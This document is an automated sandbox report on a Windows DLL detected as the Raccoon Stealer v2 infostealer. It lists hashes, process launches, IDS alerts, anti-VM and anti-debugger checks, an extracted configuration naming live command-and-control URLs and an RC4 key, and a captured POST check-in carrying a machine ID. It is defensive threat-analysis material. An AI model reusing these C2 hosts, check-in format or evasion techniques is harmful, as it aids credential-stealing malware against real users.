Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll

Overview

General Information

Sample Name:B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll
Analysis ID:803495
MD5:4979beaa139791aa9d265ddc00fff0c6
SHA1:22301285c8a3e4fc0d8086f23265a2b5e7552544
SHA256:b94872e1a7599af25caa25013fc0054e5affda6cfaef65338aa344ca2b21b4db
Tags:dllRecordBreakersigned
Infos:

Detection

Raccoon Stealer v2
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Checks for debuggers (devices)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains capabilities to detect virtual machines
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
PE / OLE file has an invalid certificate
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)
Entry point lies outside standard sections

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6124 cmdline: loaddll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1424 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1252 cmdline: rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5036 cmdline: rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4516 cmdline: rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
{"C2 url": ["http://85.192.63.204/", "http://185.229.65.197/"], "Bot ID": "e501fdc78ff3edbb9f720e1766e14ded", "RC4_key1": "e501fdc78ff3edbb9f720e1766e14ded"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
          00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
            00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
              Click to see the 3 entries
              No Sigma rule has matched
              Timestamp:192.168.2.7185.229.65.19749716802036934 02/10/23-01:56:48.125019
              SID:2036934
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.7185.229.65.19749721802043003 02/10/23-01:57:02.089245
              SID:2043003
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.7185.229.65.19749717802043003 02/10/23-01:56:49.043678
              SID:2043003
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.7185.229.65.19749717802036934 02/10/23-01:56:49.043678
              SID:2036934
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.7185.229.65.19749716802043003 02/10/23-01:56:48.125019
              SID:2043003
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.7185.229.65.19749721802036934 02/10/23-01:57:02.089245
              SID:2036934
              Source Port:49721
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllReversingLabs: Detection: 43%
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllVirustotal: Detection: 71%Perma Link
              Source: 4.2.rundll32.exe.10000000.0.unpackMalware Configuration Extractor: Raccoon {"C2 url": ["http://85.192.63.204/", "http://185.229.65.197/"], "Bot ID": "e501fdc78ff3edbb9f720e1766e14ded", "RC4_key1": "e501fdc78ff3edbb9f720e1766e14ded"}
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT

              Networking

              barindex
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.229.65.197 80Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 85.192.63.204 80Jump to behavior
              Source: TrafficSnort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49716 -> 185.229.65.197:80
              Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49716 -> 185.229.65.197:80
              Source: TrafficSnort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49717 -> 185.229.65.197:80
              Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49717 -> 185.229.65.197:80
              Source: TrafficSnort IDS: 2043003 ET TROJAN Win32/RecordBreaker - Observed UA M5 (23591) 192.168.2.7:49721 -> 185.229.65.197:80
              Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49721 -> 185.229.65.197:80
              Source: Malware configuration extractorURLs: http://85.192.63.204/
              Source: Malware configuration extractorURLs: http://185.229.65.197/
              Source: Joe Sandbox ViewASN Name: LINK-ASRU LINK-ASRU
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.204
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.229.65.197
              Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/
              Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/5563209-4053062332-1002
              Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/9
              Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/=D
              Source: rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/c
              Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.229.65.197/ounterMutexv
              Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.280873956.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/
              Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/%
              Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/2
              Source: rundll32.exe, 00000003.00000003.265737014.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/53321935-2125563209-4053062332-1002
              Source: rundll32.exe, 00000003.00000002.279841751.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/b
              Source: rundll32.exe, 00000003.00000003.265737014.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.204/c
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllString found in binary or memory: http://ocsp.sectigo.com0
              Source: rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoft.c
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllString found in binary or memory: https://sectigo.com/CPS0
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: 23591Host: 185.229.65.197Content-Length: 98Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 66 72 6f 6e 74 64 65 73 6b 26 63 6f 6e 66 69 67 49 64 3d 65 35 30 31 66 64 63 37 38 66 66 33 65 64 62 62 39 66 37 32 30 65 31 37 36 36 65 31 34 64 65 64 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=e501fdc78ff3edbb9f720e1766e14ded
              Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllBinary or memory string: OriginalFilenameScanner.dll@ vs B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll
              Source: C:\Windows\System32\loaddll32.exeSection loaded: vboxhook.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeSection loaded: vboxogl.dllJump to behavior
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EF22EE0_2_02EF22EE
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEE4FE0_2_02EEE4FE
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEACC70_2_02EEACC7
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EF1CA80_2_02EF1CA8
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEBA8E0_2_02EEBA8E
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E910400_2_02E91040
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E802310_2_02E80231
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EECDE30_2_02EECDE3
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EED7F40_2_02EED7F4
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E81DD70_2_02E81DD7
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EBABA40_2_02EBABA4
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEB3830_2_02EEB383
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EF27940_2_02EF2794
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEEF640_2_02EEEF64
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EEDF620_2_02EEDF62
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EF11170_2_02EF1117
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02EF07110_2_02EF0711
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: invalid certificate
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllReversingLabs: Detection: 43%
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllVirustotal: Detection: 71%
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll"
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll,_Start@16Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\VMwareGuestDnDDataMutex
              Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Local\VMToolsHookQueueLock
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_01
              Source: classification engineClassification label: mal76.troj.evad.winDLL@10/0@0/3
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic file information: File size 2103000 > 1048576
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: Raw size of DSEG is bigger than: 0x100000 < 0x119a00
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_013902DF push edi; ret 0_3_013902E0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_013902DF push edi; ret 0_3_013902E0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_013902DF push edi; ret 0_3_013902E0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_013902DF push edi; ret 0_3_013902E0
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E80481 push ebx; retf 0_2_02E80482
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E82243 push ecx; ret 0_2_02E82244
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02E80231 push esi; retf 0_2_02E803D3
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_03170376 push cs; iretd 3_3_03170377
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: section name: DSEG
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: section name: DSEG
              Source: B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllStatic PE information: section name: DSEG
              Source: initial sampleStatic PE information: section where entry point is pointing to: DSEG
              Source: initial sampleStatic PE information: section name: DSEG entropy: 7.980689708362385
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 4220Thread sleep count: 43 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 4220Thread sleep count: 56 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 5312Thread sleep count: 56 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3340Thread sleep count: 42 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3340Thread sleep count: 57 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\system\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\VBoxHook.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: C:\Windows\SysWOW64\VBoxHook.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
              Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxHook.dllfro
              Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareGuestDnDDataMutex
              Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KERNEL32.dllUSER32.dllGDI32.dllole32.dllOLE32.dllPELockKERNEL32.dllUSER32.dllADVAPI32.dllCOMCTL32.dllSHELL32.dllUXTHEME.dllVMwareDnDManagerEventVMwareGuestDnDDataMutexLocal\VMToolsHookQueueLockVBoxHook.dllVBoxOGL.dllCannot load "%s" library (missing file).
              Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\VBoxHook.dlll
              Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Local\VMToolsHookQueueLock
              Source: rundll32.exe, 00000003.00000002.280873956.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.265737014.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.265737014.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.272568992.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279841751.000000000327D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.281263648.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279586812.0000000004010000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VBoxHook.dll
              Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareDnDManagerEvente
              Source: rundll32.exe, 00000005.00000002.301210972.0000000004CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareDnDManagerEvent
              Source: loaddll32.exe, 00000000.00000002.266057331.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system\VBoxHook.dll{]
              Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: SIWDEBUG
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: SIWVIDSTART
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: NTICE
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: SICE
              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: SIWVID
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.229.65.197 80Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 85.192.63.204 80Jump to behavior
